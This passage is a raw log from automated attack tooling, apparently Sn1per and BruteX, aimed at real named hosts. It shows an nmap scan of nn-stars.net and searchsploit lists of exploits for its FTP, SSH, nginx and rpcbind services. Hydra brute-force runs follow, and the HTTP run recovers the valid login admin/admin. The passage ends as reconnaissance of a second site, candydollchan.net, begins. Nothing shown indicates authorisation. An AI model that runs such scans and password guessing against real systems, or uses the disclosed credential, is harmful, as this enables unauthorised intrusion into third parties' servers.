1738. SYN Stealth Scan Timing: About 93.73% done; ETC: 03:57 (0:04:09 remaining)
1739. SYN Stealth Scan Timing: About 98.72% done; ETC: 03:56 (0:00:50 remaining)
1740. Discovered open port 538/tcp on 93.174.91.164
1741. Completed SYN Stealth Scan at 04:21, 5403.00s elapsed (65355 total ports)
1742. Initiating Service scan at 04:21
1743. Scanning 7 services on nn-stars.net (93.174.91.164)
1744. Completed Service scan at 04:23, 155.39s elapsed (7 services on 1 host)
1745. Initiating OS detection (try #1) against nn-stars.net (93.174.91.164)
1746. Retrying OS detection (try #2) against nn-stars.net (93.174.91.164)
1747. NSE: Script scanning 93.174.91.164.
1748. Initiating NSE at 04:24
1749. Completed NSE at 04:24, 0.56s elapsed
1750. Initiating NSE at 04:24
1751. Completed NSE at 04:24, 1.95s elapsed
1752. Nmap scan report for nn-stars.net (93.174.91.164)
1753. Host is up (0.12s latency).
1754. rDNS record for 93.174.91.164: no-reverse-dns-configured.com
1755. Not shown: 65164 closed ports, 184 filtered ports
1756. PORT STATE SERVICE VERSION
1757. 21/tcp open ftp vsftpd 3.0.2
1758. 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u6 (protocol 2.0)
1759. 53/tcp open domain
1760. 80/tcp open http nginx
1761. 111/tcp open rpcbind 2-4 (RPC #100000)
1762. 538/tcp open gdomap?
1763. 44601/tcp open status 1 (RPC #100024)
1764. Aggressive OS guesses: Linux 2.6.39 (96%), Linux 3.2 - 3.8 (94%), Linux 3.1 - 3.2 (94%), WatchGuard Fireware 11.8 (94%), Linux 3.5 (93%), Linux 3.8 (93%), Linux 2.6.32 - 2.6.39 (92%), Linux 2.6.32 - 3.0 (91%), Linux 2.6.32 (91%), Linux 2.6.32 or 3.10 (91%)
1765. No exact OS matches for host (test conditions non-ideal).
1766. Uptime guess: 3.639 days (since Mon Oct 23 13:04:14 2017)
1767. Network Distance: 7 hops
1768. TCP Sequence Prediction: Difficulty=254 (Good luck!)
1769. IP ID Sequence Generation: All zeros
1770. Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
1771.  
1772. Read data files from: /usr/bin/../share/nmap
1773. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1774. Nmap done: 1 IP address (1 host up) scanned in 5568.49 seconds
1775. Raw packets sent: 223089 (9.821MB) | Rcvd: 223436 (9.390MB)
1776.  + -- ----------------------------=[Enumerating Exploits via Searchsploit]=--- -- +
1777. [i] Reading: '/usr/share/sniper/loot/nmap/nmap-nn-stars.net.xml'
1778.  
1779. --------------------------------------------- ----------------------------------
1780. Exploit Title | Path
1781. | (/usr/share/exploitdb/platforms/)
1782. --------------------------------------------- ----------------------------------
1783. vsftpd 2.0.5 - 'CWD' Authenticated Remote Me | linux/dos/5814.pl
1784. vsftpd 2.0.5 - 'deny_file' Option Remote Den | windows/dos/31818.sh
1785. vsftpd 2.0.5 - 'deny_file' Option Remote Den | windows/dos/31819.pl
1786. vsftpd 2.3.2 - Denial of Service | linux/dos/16270.c
1787. vsftpd 2.3.4 - Backdoor Command Execution (M | unix/remote/17491.rb
1788. --------------------------------------------- ----------------------------------
1789. --------------------------------------------- ----------------------------------
1790. Exploit Title | Path
1791. | (/usr/share/exploitdb/platforms/)
1792. --------------------------------------------- ----------------------------------
1793. vsftpd 2.3.2 - Denial of Service | linux/dos/16270.c
1794. vsftpd 2.3.4 - Backdoor Command Execution (M | unix/remote/17491.rb
1795. --------------------------------------------- ----------------------------------
1796. --------------------------------------------- ----------------------------------
1797. Exploit Title | Path
1798. | (/usr/share/exploitdb/platforms/)
1799. --------------------------------------------- ----------------------------------
1800. Debian OpenSSH - Authenticated Remote SELinu | linux/remote/6094.txt
1801. Dropbear / OpenSSH Server - 'MAX_UNAUTH_CLIE | multiple/dos/1572.pl
1802. FreeBSD OpenSSH 3.5p1 - Remote Command Execu | freebsd/remote/17462.txt
1803. Novell Netware 6.5 - OpenSSH Remote Stack Ov | novell/dos/14866.txt
1804. OpenSSH 1.2 - '.scp' File Create/Overwrite | linux/remote/20253.sh
1805. OpenSSH 2.x/3.0.1/3.0.2 - Channel Code Off-b | unix/remote/21314.txt
1806. OpenSSH 2.x/3.x - Kerberos 4 TGT/AFS Token B | linux/remote/21402.txt
1807. OpenSSH 3.x - Challenge-Response Buffer Over | unix/remote/21578.txt
1808. OpenSSH 3.x - Challenge-Response Buffer Over | unix/remote/21579.txt
1809. OpenSSH 4.3 p1 - Duplicated Block Remote Den | multiple/dos/2444.sh
1810. OpenSSH 6.8 < 6.9 - 'PTY' Privilege Escalati | linux/local/41173.c
1811. OpenSSH 7.2 - Denial of Service | linux/dos/40888.py
1812. OpenSSH 7.2p1 - Authenticated xauth Command | multiple/remote/39569.py
1813. OpenSSH 7.2p2 - Username Enumeration | linux/remote/40136.py
1814. OpenSSH < 7.4 - 'UsePrivilegeSeparation Disa | linux/local/40962.txt
1815. OpenSSH < 7.4 - agent Protocol Arbitrary Lib | linux/remote/40963.txt
1816. OpenSSH/PAM 3.6.1p1 - 'gossh.sh' Remote User | linux/remote/26.sh
1817. OpenSSH/PAM 3.6.1p1 - Remote Users Discovery | linux/remote/25.c
1818. OpenSSHd 7.2p2 - Username Enumeration (PoC) | linux/remote/40113.txt
1819. Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timin | multiple/remote/3303.sh
1820. glibc-2.2 / openssh-2.3.0p1 / glibc 2.1.9x - | linux/local/258.sh
1821. --------------------------------------------- ----------------------------------
1822. --------------------------------------------- ----------------------------------
1823. Exploit Title | Path
1824. | (/usr/share/exploitdb/platforms/)
1825. --------------------------------------------- ----------------------------------
1826. Novell Netware 6.5 - OpenSSH Remote Stack Ov | novell/dos/14866.txt
1827. OpenSSH 6.8 < 6.9 - 'PTY' Privilege Escalati | linux/local/41173.c
1828. OpenSSH/PAM 3.6.1p1 - 'gossh.sh' Remote User | linux/remote/26.sh
1829. OpenSSH/PAM 3.6.1p1 - Remote Users Discovery | linux/remote/25.c
1830. Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timin | multiple/remote/3303.sh
1831. --------------------------------------------- ----------------------------------
1832. --------------------------------------------- ----------------------------------
1833. Exploit Title | Path
1834. | (/usr/share/exploitdb/platforms/)
1835. --------------------------------------------- ----------------------------------
1836. Adobe Flash Player - domainMemory ByteArray | windows/remote/36956.rb
1837. Adobe Flash Player 7.0.x/8.0.x/9.0.x - Activ | linux/remote/30907.txt
1838. Alabanza Control Panel 3.0 - Domain Modifica | cgi/remote/20238.txt
1839. Apple Safari 2.0.4 - Cross-Domain Browser Lo | multiple/remote/30078.js
1840. Apple iOS/macOS Kernel - Use-After-Free Due | multiple/dos/42054.c
1841. BlackBoard Academic Suite 6.2.3.23 - Framese | jsp/webapps/26778.txt
1842. Cacheflow CacheOS 3.1.x/4.0.x/4.1 - Unresolv | multiple/remote/21649.txt
1843. Cachelogic Expired Domains Script 1.0 - Mult | php/webapps/17428.txt
1844. CdomainFree 2.4 - Remote Command Execution | multiple/remote/19242.txt
1845. D-Link DCS Series Cameras - Insecure Crossdo | hardware/webapps/42074.txt
1846. DigiDomain 2.2 - 'lookup_result.asp?domain' | asp/webapps/31546.txt
1847. DigiDomain 2.2 - 'suggest_result.asp' Multip | asp/webapps/31547.txt
1848. Domain Group Network GooCMS 1.02 - 'index.ph | php/webapps/32218.txt
1849. Domain Marketplace Script - SQL Injection | php/webapps/41582.txt
1850. Domain Seller Pro 1.5 - 'id' SQL Injection | php/webapps/7052.txt
1851. Domain Shop - 'index.php' Cross-Site Scripti | php/webapps/36272.txt
1852. Domain Trader 2.0 - 'catalog.php' Cross-Site | php/webapps/31091.txt
1853. Domain Verkaus & Auktions Portal - 'index.ph | php/webapps/33763.txt
1854. Domains & Hostings Manager PRO 3.0 - 'entrie | php/webapps/41319.txt
1855. Domains Marketplace Script 1.1 - Authenticat | php/webapps/41133.txt
1856. FreeBSD 3.0 - UNIX-domain Panic (Denial of S | freebsd/dos/19130.c
1857. FreeBSD 3.1 / Solaris 2.6 - Domain Socket | freebsd/local/19346.c
1858. GNOME esound 0.2.19 - Unix Domain Socket Rac | unix/local/20212.c
1859. Grandstream Budge Tone-200 IP Phone - Digest | hardware/dos/3535.pl
1860. HP ProCurve Manager - SNAC UpdateDomainContr | windows/remote/28336.rb
1861. Hosting Controller 6.1 HotFix 2.2 - Add Doma | asp/webapps/1112.txt
1862. IBM Tivoli Access Manager for E-Business - ' | multiple/webapps/34909.txt
1863. JBMC Software DirectAdmin 1.403 - 'domain' C | java/webapps/37033.txt
1864. ManageEngine ADManager Plus 5.2 Build 5210 - | java/webapps/36667.txt
1865. Microsoft Internet Explorer 5 - Classic Mode | windows/remote/22728.txt
1866. Microsoft Internet Explorer 5.0.1 - Cached C | windows/remote/33024.txt
1867. Microsoft Internet Explorer 5.0.1 - JavaScri | windows/remote/24265.html
1868. Microsoft Internet Explorer 5/6 - Cross-Doma | windows/remote/23766.html
1869. Microsoft Internet Explorer 6 - Meta Data Fo | windows/remote/24069.html
1870. Microsoft Internet Explorer 7/8 - CSS Handli | windows/dos/34602.html
1871. Microsoft Internet Explorer 7/8 Beta 1 - Fra | windows/remote/31996.txt
1872. Microsoft Windows - Wkssvc NetrJoinDomain2 S | windows/remote/2800.cpp
1873. Microsoft XML Core Services DTD - Cross-Doma | windows/remote/7196.html
1874. Mozilla 1.x / opera 6/7 - Timed document.wri | multiple/remote/22751.txt
1875. Mozilla Firefox 1.0/1.5 XBL - MOZ-BINDING Pr | linux/remote/27150.txt
1876. Mozilla Firefox 2.0.0.1 - 'location.hostname | windows/remote/3340.html
1877. Mozilla Firefox 3.6.8 - 'Math.random()' Cros | unix/remote/34621.c
1878. MyPHP CMS 0.3 - 'domain' Remote File Inclusi | php/webapps/1983.txt
1879. Netscape Navigator 4.0.8 - 'about:' Domain I | unix/remote/20791.php
1880. OpenSSH < 7.4 - 'UsePrivilegeSeparation Disa | linux/local/40962.txt
1881. PHPDomainRegister 0.4a-RC2-dev - Multiple Vu | php/webapps/18374.txt
1882. PHPpool media Domain Verkaufs und Auktions P | php/webapps/11733.txt
1883. Planet Script 1.x - 'idomains.php' Cross-Sit | php/webapps/33993.txt
1884. QNAP QTS < 4.2.4 - Domain Privilege Escalati | hardware/local/41745.txt
1885. Research In Motion BlackBerry Device Softwar | hardware/remote/34802.html
1886. Scripts Genie Domain Trader - 'catalog.php?i | php/webapps/24510.txt
1887. SiteTurn Domain Manager Pro - Admin Panel Cr | php/webapps/26391.html
1888. Solaris 2.3/2.4/2.5/2.5.1/2.6/7.0 snoop - 'p | solaris/remote/19663.c
1889. Ubiquiti Networks UniFi Video Default - 'cro | php/webapps/39268.java
1890. Ucenter Projekt 2.0 - Insecure crossdomain ( | php/webapps/12455.txt
1891. WEBBDOMAIN Petition 1.02/2.0/3.0 - Authentic | php/webapps/6983.txt
1892. WEBBDOMAIN Polls 1.01 - Authentication Bypas | php/webapps/6984.txt
1893. WEBBDOMAIN Post Card 1.02 - 'catid' SQL Inje | php/webapps/6977.txt
1894. WEBBDOMAIN Post Card 1.02 - Authentication B | php/webapps/6989.txt
1895. WEBBDOMAIN Quiz 1.02 - Authentication Bypass | php/webapps/6985.txt
1896. WEBBDOMAIN WebShop 1.02 - SQL Injection / Cr | php/webapps/6974.txt
1897. WEBBDOMAIN Webshop 1.02 - Authentication Byp | php/webapps/6986.txt
1898. Web Host Automation Ltd. Helm 3.2.10 Beta - | asp/webapps/27486.txt
1899. WebKit - 'parent/top' Cross Domain Scripting | multiple/remote/33047.html
1900. WebKit - JavaScript 'onload()' Event Cross D | multiple/remote/33033.html
1901. WebKit 1.2.x - Local Webpage Cross Domain In | windows/remote/35434.txt
1902. WordPress Plugin WHOIS 1.4.2 3 - 'domain' Cr | php/webapps/36488.txt
1903. WordPress Plugin oQey-Gallery 0.2 - 'tbpv_do | php/webapps/35288.txt
1904. Xen 3.3 - XenStore Domain Configuration Data | linux/local/32446.txt
1905. cPanel - Authenticated (lastvisit.html domai | multiple/remote/9039.txt
1906. cPanel WebHost Manager 3.1 - 'domts2?domain' | php/webapps/29185.txt
1907. cPanel WebHost Manager 3.1 - 'editzone?domai | php/webapps/29186.txt
1908. cPanel WebHost Manager 3.1 - 'park?ndomain' | php/webapps/29188.txt
1909. --------------------------------------------- ----------------------------------
1910. --------------------------------------------- ----------------------------------
1911. Exploit Title | Path
1912. | (/usr/share/exploitdb/platforms/)
1913. --------------------------------------------- ----------------------------------
1914. Nginx (Debian-Based Distros + Gentoo) - 'log | linux/local/40768.sh
1915. Nginx 0.6.36 - Directory Traversal | multiple/remote/12804.txt
1916. Nginx 0.6.38 - Heap Corruption | linux/local/14830.py
1917. Nginx 0.6.x - Arbitrary Code Execution NullB | multiple/webapps/24967.txt
1918. Nginx 0.7.0 < 0.7.61 / 0.6.0 < 0.6.38 / 0.5. | linux/dos/9901.txt
1919. Nginx 0.7.61 - WebDAV Directory Traversal | multiple/remote/9829.txt
1920. Nginx 0.7.64 - Terminal Escape Sequence in L | multiple/remote/33490.txt
1921. Nginx 0.7.65/0.8.39 (dev) - Source Disclosur | windows/remote/13822.txt
1922. Nginx 0.8.36 - Source Disclosure / Denial of | windows/remote/13818.txt
1923. Nginx 1.1.17 - URI Processing SecURIty Bypas | multiple/remote/38846.txt
1924. Nginx 1.3.9 < 1.4.0 - Chuncked Encoding Stac | linux/remote/25775.rb
1925. Nginx 1.3.9 < 1.4.0 - Denial of Service (PoC | linux/dos/25499.py
1926. Nginx 1.3.9/1.4.0 (x86) - Brute Force Remote | lin_x86/remote/26737.pl
1927. Nginx 1.4.0 (Generic Linux x64) - Remote Exp | lin_x86-64/remote/32277.txt
1928. --------------------------------------------- ----------------------------------
1929. --------------------------------------------- ----------------------------------
1930. Exploit Title | Path
1931. | (/usr/share/exploitdb/platforms/)
1932. --------------------------------------------- ----------------------------------
1933. RPCBind / libtirpc - Denial of Service | linux/dos/41974.rb
1934. Wietse Venema Rpcbind Replacement 2.1 - Deni | unix/dos/20376.txt
1935. rpcbind - CALLIT procedure UDP Crash (PoC) | linux/dos/26887.rb
1936. --------------------------------------------- ----------------------------------
1937. --------------------------------------------- ----------------------------------
1938. Exploit Title | Path
1939. | (/usr/share/exploitdb/platforms/)
1940. --------------------------------------------- ----------------------------------
1941. Wietse Venema Rpcbind Replacement 2.1 - Deni | unix/dos/20376.txt
1942. --------------------------------------------- ----------------------------------
1943. --------------------------------------------- ----------------------------------
1944. Exploit Title | Path
1945. | (/usr/share/exploitdb/platforms/)
1946. --------------------------------------------- ----------------------------------
1947. gdomap - Multiple Local Information Disclosu | linux/local/33963.txt
1948. --------------------------------------------- ----------------------------------
1949. --------------------------------------------- ----------------------------------
1950. Exploit Title | Path
1951. | (/usr/share/exploitdb/platforms/)
1952. --------------------------------------------- ----------------------------------
1953. Accellion FTA - getStatus verify_oauth_token | hardware/remote/37597.rb
1954. AdminBot 9.0.5 - 'live_status.lib.php' Remot | php/webapps/4005.txt
1955. Apache 2.4.7 (mod_status) - Scoreboard Handl | linux/dos/34133.txt
1956. Apache mod_perl - 'Apache::Status' / 'Apache | multiple/remote/9993.txt
1957. Apple Safari 1.2 Web Browser - TABLE Status | osx/remote/24716.txt
1958. Apple Safari Web Browser 1.x - HTML Form Sta | osx/dos/24843.txt
1959. Cisco VoIP Phone CP-7940 3.x - Spoofed SIP S | hardware/remote/25949.pl
1960. Dell SonicWALL Scrutinizer 9.0.1 - 'statusFi | php/webapps/20033.py
1961. Dicshunary 0.1a - 'check_status.php' Remote | php/webapps/2808.txt
1962. EPSON Status Monitor 3 - Privilege Escalatio | windows/local/9305.txt
1963. Google Chrome 3.0195.38 - Status Bar Obfusca | windows/dos/10879.html
1964. HP Insight Diagnostics Online Edition 8.4 - | php/webapps/34544.txt
1965. HP Network Node Manager (NMM) i 9.10 - 'nnm/ | jsp/webapps/36356.txt
1966. ICQ 6 - 'Personal Status Manager' Remote Buf | windows/dos/31656.txt
1967. Ipswitch IMail 5.0.8/6.0/6.1 - IMonitor stat | windows/dos/19711.txt
1968. Joomla! Component User Status - Local File I | php/webapps/11998.txt
1969. Joomla! Component com_virtuemart - order_sta | php/webapps/11271.txt
1970. MTink 0.9.x - Printer Status Monitor Environ | linux/local/22189.txt
1971. MailEnable IMAPD 1.54 - STATUS Request Buffe | windows/remote/16485.rb
1972. ManageEngine Desktop Central StatusUpdate - | windows/remote/34594.rb
1973. Microsoft Internet Explorer 5.0.1 - Mouse Ev | windows/remote/25095.txt
1974. Microsoft Internet Explorer 6 - HTML Form St | windows/remote/23903.html
1975. Microsoft Internet Explorer 6 - IFRAME Statu | windows/remote/24720.txt
1976. Microsoft Internet Explorer 6 - TABLE Status | windows/remote/24712.txt
1977. Microsoft WININET.dll - CHttp­Header­Parse | windows/dos/40747.html
1978. Mozilla Firefox 3.0.5 - Status Bar Obfuscati | windows/remote/7842.html
1979. Mozilla Suite/Firefox/Thunderbird - Nested A | linux/remote/25221.txt
1980. MyBB MyStatus 3.1 - SQL Injection | php/webapps/17972.txt
1981. Nagios 3.0.6 - 'statuswml.cgi' Arbitrary She | cgi/remote/33051.txt
1982. Nagios3 - statuswml.cgi Command Injection (M | unix/webapps/9861.rb
1983. Nagios3 - statuswml.cgi Ping Command Executi | cgi/webapps/16908.rb
1984. Novell NetMail 3.52d - IMAP STATUS Buffer Ov | windows/remote/16483.rb
1985. Opera 10.10 - Status Bar Obfuscation | multiple/dos/10870.html
1986. Opera Web Browser 8.0/8.5 - HTML Form Status | multiple/remote/26531.html
1987. OrangeHRM 2.7 RC - '/plugins/ajaxCalls/haltR | php/webapps/37143.txt
1988. Pligg CMS 1.1.2 - 'status' SQL Injection | php/webapps/36495.txt
1989. PlutoStatus Locator 1.0pre alpha - 'index.ph | php/webapps/31202.txt
1990. Post Affiliate Pro 3 - 'umprof_status' Blind | php/webapps/7238.txt
1991. Status2k - Remote Add Admin | php/webapps/11258.html
1992. Status2k Server Monitoring Software - Multip | php/webapps/34239.txt
1993. StatusNet/Laconica 0.7.4/0.8.2/0.9.0beta3 - | php/webapps/28956.txt
1994. WhatsApp Status Changer 0.2 - Exploit | php/webapps/18396.sh
1995. Yahoo! Messenger 5.x/6.0 - Offline Mode Stat | windows/remote/25196.txt
1996. iScripts AutoHoster - 'checktransferstatus.p | php/webapps/38885.txt
1997. iScripts AutoHoster - 'checktransferstatusbc | php/webapps/38886.txt
1998. osCMax 2.5 - '/admin/stats_monthly_sales.php | php/webapps/37042.txt
1999. osCMax 2.5 - '/admin/stats_monthly_sales.php | php/webapps/37048.txt
2000. osCommerce 2.2 - '/admin/orders_status.php?p | php/webapps/28750.txt
2001. osTicket - 'tickets.php?status' Cross-Site S | php/webapps/38162.txt
2002. pfSense - 'status_graph.php?if' Cross-Site S | hardware/remote/35070.txt
2003. phpMyAdmin 2.11.1 - 'Server_Status.php' Cros | php/webapps/30733.txt
2004. xtell 2.6.1 - User Status Remote Information | linux/remote/21310.txt
2005. --------------------------------------------- ----------------------------------
2006. --------------------------------------------- ----------------------------------
2007. Exploit Title | Path
2008. | (/usr/share/exploitdb/platforms/)
2009. --------------------------------------------- ----------------------------------
2010. Apple Safari 1.2 Web Browser - TABLE Status | osx/remote/24716.txt
2011. Apple Safari Web Browser 1.x - HTML Form Sta | osx/dos/24843.txt
2012. Dell SonicWALL Scrutinizer 9.0.1 - 'statusFi | php/webapps/20033.py
2013. Dicshunary 0.1a - 'check_status.php' Remote | php/webapps/2808.txt
2014. Google Chrome 3.0195.38 - Status Bar Obfusca | windows/dos/10879.html
2015. HP Network Node Manager (NMM) i 9.10 - 'nnm/ | jsp/webapps/36356.txt
2016. Ipswitch IMail 5.0.8/6.0/6.1 - IMonitor stat | windows/dos/19711.txt
2017. MailEnable IMAPD 1.54 - STATUS Request Buffe | windows/remote/16485.rb
2018. Microsoft Internet Explorer 5.0.1 - Mouse Ev | windows/remote/25095.txt
2019. Microsoft WININET.dll - CHttp­Header­Parse | windows/dos/40747.html
2020. MyBB MyStatus 3.1 - SQL Injection | php/webapps/17972.txt
2021. Opera 10.10 - Status Bar Obfuscation | multiple/dos/10870.html
2022. Pligg CMS 1.1.2 - 'status' SQL Injection | php/webapps/36495.txt
2023. PlutoStatus Locator 1.0pre alpha - 'index.ph | php/webapps/31202.txt
2024. phpMyAdmin 2.11.1 - 'Server_Status.php' Cros | php/webapps/30733.txt
2025. xtell 2.6.1 - User Status Remote Information | linux/remote/21310.txt
2026. --------------------------------------------- ----------------------------------
2027.  + -- ----------------------------=[Running Brute Force]=--------------------- -- +
2028.  __________ __ ____ ___
2029.  \______ \_______ __ ___/ |_ ____ \ \/ /
2030.  | | _/\_ __ \ | \ __\/ __ \ \ / 
2031.  | | \ | | \/ | /| | \ ___/ / \ 
2032.  |______ / |__| |____/ |__| \___ >___/\ \ 
2033.  \/ \/ \_/
2034.  
2035.  + -- --=[BruteX v1.7 by 1N3
2036.  + -- --=[http://crowdshield.com
2037.  
2038.  
2039. ################################### Running Port Scan ##############################
2040.  
2041. Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-27 04:24 EDT
2042. Nmap scan report for nn-stars.net (93.174.91.164)
2043. Host is up (0.14s latency).
2044. rDNS record for 93.174.91.164: no-reverse-dns-configured.com
2045. Not shown: 19 closed ports, 3 filtered ports
2046. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
2047. PORT STATE SERVICE
2048. 21/tcp open ftp
2049. 22/tcp open ssh
2050. 53/tcp open domain
2051. 80/tcp open http
2052.  
2053. Nmap done: 1 IP address (1 host up) scanned in 2.51 seconds
2054.  
2055. ################################### Running Brute Force ############################
2056.  
2057.  + -- --=[Port 21 opened... running tests...
2058. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
2059.  
2060. Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-27 04:24:11
2061. [DATA] max 1 task per 1 server, overall 1 task, 30 login tries, ~30 tries per task
2062. [DATA] attacking ftp://nn-stars.net:21/
2063. 1 of 1 target completed, 0 valid passwords found
2064. Hydra (http://www.thc.org/thc-hydra) finished at 2017-10-27 04:25:07
2065.  + -- --=[Port 22 opened... running tests...
2066. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
2067.  
2068. Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-27 04:25:07
2069. [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
2070. [DATA] attacking ssh://nn-stars.net:22/
2071. [STATUS] 16.00 tries/min, 16 tries in 00:01h, 1480 to do in 01:33h, 1 active
2072. [STATUS] 13.67 tries/min, 41 tries in 00:03h, 1455 to do in 01:47h, 1 active
2073. [STATUS] 14.43 tries/min, 101 tries in 00:07h, 1395 to do in 01:37h, 1 active
2074. [STATUS] 14.42 tries/min, 173 tries in 00:12h, 1323 to do in 01:32h, 1 active
2075. [STATUS] 14.47 tries/min, 246 tries in 00:17h, 1250 to do in 01:27h, 1 active
2076. [STATUS] 14.59 tries/min, 321 tries in 00:22h, 1175 to do in 01:21h, 1 active
2077. [STATUS] 14.56 tries/min, 393 tries in 00:27h, 1103 to do in 01:16h, 1 active
2078. [STATUS] 14.50 tries/min, 464 tries in 00:32h, 1032 to do in 01:12h, 1 active
2079. [STATUS] 14.30 tries/min, 529 tries in 00:37h, 967 to do in 01:08h, 1 active
2080. [STATUS] 14.36 tries/min, 603 tries in 00:42h, 893 to do in 01:03h, 1 active
2081. [STATUS] 14.40 tries/min, 677 tries in 00:47h, 819 to do in 00:57h, 1 active
2082. [STATUS] 14.23 tries/min, 740 tries in 00:52h, 756 to do in 00:54h, 1 active
2083. [STATUS] 14.21 tries/min, 810 tries in 00:57h, 686 to do in 00:49h, 1 active
2084. [STATUS] 13.98 tries/min, 867 tries in 01:02h, 629 to do in 00:45h, 1 active
2085. [STATUS] 13.66 tries/min, 915 tries in 01:07h, 581 to do in 00:43h, 1 active
2086. [STATUS] 13.62 tries/min, 981 tries in 01:12h, 515 to do in 00:38h, 1 active
2087. [STATUS] 13.42 tries/min, 1033 tries in 01:17h, 463 to do in 00:35h, 1 active
2088. [STATUS] 13.11 tries/min, 1075 tries in 01:22h, 421 to do in 00:33h, 1 active
2089. [STATUS] 12.89 tries/min, 1121 tries in 01:27h, 375 to do in 00:30h, 1 active
2090. [STATUS] 12.65 tries/min, 1164 tries in 01:32h, 332 to do in 00:27h, 1 active
2091. [STATUS] 12.41 tries/min, 1204 tries in 01:37h, 292 to do in 00:24h, 1 active
2092. [STATUS] 12.17 tries/min, 1241 tries in 01:42h, 255 to do in 00:21h, 1 active
2093. [STATUS] 11.97 tries/min, 1281 tries in 01:47h, 215 to do in 00:18h, 1 active
2094. [STATUS] 11.71 tries/min, 1312 tries in 01:52h, 184 to do in 00:16h, 1 active
2095. [STATUS] 11.52 tries/min, 1348 tries in 01:57h, 148 to do in 00:13h, 1 active
2096. [STATUS] 11.49 tries/min, 1356 tries in 01:58h, 140 to do in 00:13h, 1 active
2097. [STATUS] 11.45 tries/min, 1362 tries in 01:59h, 134 to do in 00:12h, 1 active
2098. [STATUS] 11.42 tries/min, 1370 tries in 02:00h, 126 to do in 00:12h, 1 active
2099. [STATUS] 11.35 tries/min, 1373 tries in 02:01h, 123 to do in 00:11h, 1 active
2100. [STATUS] 11.31 tries/min, 1380 tries in 02:02h, 116 to do in 00:11h, 1 active
2101. [STATUS] 11.28 tries/min, 1388 tries in 02:03h, 108 to do in 00:10h, 1 active
2102. [STATUS] 11.25 tries/min, 1395 tries in 02:04h, 101 to do in 00:09h, 1 active
2103. [STATUS] 11.24 tries/min, 1405 tries in 02:05h, 91 to do in 00:09h, 1 active
2104. [STATUS] 11.21 tries/min, 1413 tries in 02:06h, 83 to do in 00:08h, 1 active
2105. [STATUS] 11.21 tries/min, 1424 tries in 02:07h, 72 to do in 00:07h, 1 active
2106. [STATUS] 11.19 tries/min, 1432 tries in 02:08h, 64 to do in 00:06h, 1 active
2107. [STATUS] 11.16 tries/min, 1439 tries in 02:09h, 57 to do in 00:06h, 1 active
2108. [STATUS] 11.07 tries/min, 1439 tries in 02:10h, 57 to do in 00:06h, 1 active
2109. [STATUS] 11.06 tries/min, 1449 tries in 02:11h, 47 to do in 00:05h, 1 active
2110. [STATUS] 11.05 tries/min, 1458 tries in 02:12h, 38 to do in 00:04h, 1 active
2111. [STATUS] 11.02 tries/min, 1466 tries in 02:13h, 30 to do in 00:03h, 1 active
2112. [STATUS] 10.99 tries/min, 1473 tries in 02:14h, 23 to do in 00:03h, 1 active
2113. [STATUS] 10.99 tries/min, 1483 tries in 02:15h, 13 to do in 00:02h, 1 active
2114. [STATUS] 10.98 tries/min, 1493 tries in 02:16h, 3 to do in 00:01h, 1 active
2115. 1 of 1 target completed, 0 valid passwords found
2116. Hydra (http://www.thc.org/thc-hydra) finished at 2017-10-27 06:41:33
2117.  + -- --=[Port 23 closed... skipping.
2118.  + -- --=[Port 25 closed... skipping.
2119.  + -- --=[Port 80 opened... running tests...
2120. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
2121. Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-27 06:41:33
2122. [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
2123. [DATA] attacking http-get://nn-stars.net:80//
2124. [80][http-get] host: nn-stars.net login: admin password: admin
2125. [STATUS] attack finished for nn-stars.net (valid pair found)
2126. 1 of 1 target successfully completed, 1 valid password found
2127. Hydra (http://www.thc.org/thc-hydra) finished at 2017-10-27 06:41:38
2128.  + -- --=[Port 110 closed... skipping.
2129.  + -- --=[Port 139 closed... skipping.
2130.  + -- --=[Port 162 closed... skipping.
2131.  + -- --=[Port 389 closed... skipping.
2132.  + -- --=[Port 443 closed... skipping.
2133.  + -- --=[Port 445 closed... skipping.
2134.  + -- --=[Port 512 closed... skipping.
2135.  + -- --=[Port 513 closed... skipping.
2136.  + -- --=[Port 514 closed... skipping.
2137.  + -- --=[Port 993 closed... skipping.
2138.  + -- --=[Port 1433 closed... skipping.
2139.  + -- --=[Port 1521 closed... skipping.
2140.  + -- --=[Port 3306 closed... skipping.
2141.  + -- --=[Port 3389 closed... skipping.
2142.  + -- --=[Port 5432 closed... skipping.
2143.  + -- --=[Port 5900 closed... skipping.
2144.  + -- --=[Port 5901 closed... skipping.
2145.  + -- --=[Port 8000 closed... skipping.
2146.  + -- --=[Port 8080 closed... skipping.
2147.  + -- --=[Port 8100 closed... skipping.
2148.  + -- --=[Port 6667 closed... skipping.
2149. #######################################################################################################################################
2150. Hostname candydollchan.net ISP Lucky Net Ltd (AS3254)
2151. Continent Europe Flag
2152. UA
2153. Country Ukraine Country Code UA (UKR)
2154. Region Unknown Local time 27 Oct 2017 10:24 EEST
2155. City Unknown Latitude 50.45
2156. IP Address 91.219.29.120 Longitude 30.523
2157. ######################################################################################################################################
2158. [i] Scanning Site: http://candydollchan.net
2159.  
2160.  
2161.  
2162. B A S I C I N F O
2163. ====================
2164.  
2165.  
2166. [+] Site Title: Candydoll Downloads - Candydollchan
2167. [+] IP address: 91.219.29.120
2168. [+] Web Server: nginx/1.10.2
2169. [+] CMS: Could Not Detect
2170. [+] Cloudflare: Not Detected
2171. [+] Robots File: Found
2172.  
2173. -------------[ contents ]----------------
2174. User-agent: *
2175. Disallow:
2176. Host: candydollchan.net
2177. Sitemap: http://candydollchan.net/sitemap.xml
2178. -----------[end of contents]-------------
2179.  
2180.  
2181.  
2182. W H O I S L O O K U P
2183. ========================
2184.  
2185. Domain Name: CANDYDOLLCHAN.NET
